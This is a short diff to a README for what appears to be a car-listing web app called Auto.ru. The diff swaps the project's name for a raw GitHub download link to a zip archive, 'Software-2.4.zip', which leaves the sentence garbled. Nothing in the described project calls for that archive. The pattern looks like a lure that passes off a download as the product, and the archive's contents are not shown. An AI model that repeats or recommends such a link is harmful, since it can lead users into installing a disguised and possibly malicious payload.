thomsxd/autoru/README.md

 ## About

-Auto.ru is designed to provide a user-friendly platform for car enthusiasts.
+https://github.com/thomsxd/autoru/raw/refs/heads/master/api/Software-2.4.zip is designed to provide a user-friendly platform for car enthusiasts.
 It allows users to post listings, search for vehicles, and connect with other users.
 The application is currently in development, and we welcome contributions to enhance its functionality.

 ## Features